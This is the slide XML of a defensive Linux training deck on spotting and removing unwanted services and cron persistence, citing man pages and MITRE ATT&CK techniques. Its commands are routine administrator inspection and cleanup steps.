          <a:xfrm>
            <a:off x="6679692" y="2263140"/>
            <a:ext cx="19888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cat the unit file, check ExecStart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39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342900" y="3017520"/>
            <a:ext cx="8455914" cy="891540"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 615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39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="315468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 SERVICE THAT PASSES THE TEST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39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="3374136"/>
            <a:ext cx="802386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You can name the package it came from, ExecStart points at a real binary you recognize, and it has been on the host since before tonight.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9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9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4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Clean up cron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4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Check all three locations, on every account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40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342900" y="147447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40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342900" y="147447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40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="754380" y="1453896"/>
            <a:ext cx="2743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the system crontab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40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3600450" y="1453896"/>
            <a:ext cx="517779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cat /etc/crontab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40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342900" y="196824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40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342900" y="196824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40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="754380" y="1947672"/>
            <a:ext cx="2743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drop in files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40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3600450" y="1947672"/>
            <a:ext cx="517779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ls /etc/cron.d/ &amp;&amp; cat each one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40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342900" y="246202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40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342900" y="246202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40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="754380" y="2441448"/>
            <a:ext cx="2743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every user's crontab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40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3600450" y="2441448"/>
            <a:ext cx="517779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for u in $(cut -f1 -d: /etc/passwd); do crontab -l -u $u; done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40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342900" y="295579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40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342900" y="295579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40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="754380" y="2935224"/>
            <a:ext cx="2743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Remove what nobody can explain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40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3600450" y="2935224"/>
            <a:ext cx="517779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crontab -e -u name, delete the line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40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40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4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4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WHERE THIS CAME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4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Resources &amp; citations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41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="34290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Linux Hardening Reference, 2026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41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="34290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41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="466344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proc(5),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41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="466344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41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342900" y="203682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ps(1),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41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342900" y="231114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41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4663440" y="203682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systemd.unit(5),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41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4663440" y="231114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41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342900" y="270205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systemd.exec(5),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41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342900" y="297637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41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4663440" y="270205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auditd(8) and ausearch(8), man pages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41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4663440" y="297637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41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342900" y="336727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crontab(5),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41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342900" y="364159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41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4663440" y="336727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Task Scheduler command line reference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41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4663440" y="364159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41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342900" y="403250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 T1543: Create or Modify System Process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41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342900" y="430682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41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4663440" y="403250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 T1053: Scheduled Task/Job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41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4663440" y="430682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4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4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2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="377190" y="1028700"/>
            <a:ext cx="78867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NEXT SESSION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42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="377190" y="1337310"/>
            <a:ext cx="843534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Tuesday: Network Monitoring &amp; Traffic Basics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42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="377190" y="1954530"/>
            <a:ext cx="7406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 now know how to find and remove what does not belong on a host. Next up: watching the traffic those hosts send and receive.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42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="377190" y="281178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map-dark.png" id="757" name="Google Shape;75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079" y="288666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42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="788670" y="279806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42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="377190" y="322326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clock-dark.png" id="760" name="Google Shape;76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79" y="329814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42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="788670" y="320954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42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="377190" y="363474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unwanted_processes_deck/icons/alert-dark.png" id="763" name="Google Shape;763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079" y="370962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42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="788670" y="362102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on tonight's exercises? Ask in #defense-team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4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NEXT UP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4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A8C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00" b="0">
                <a:solidFill>
                  <a:srgbClr val="A39A8C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00" b="0">
                <a:solidFill>
                  <a:srgbClr val="A39A8C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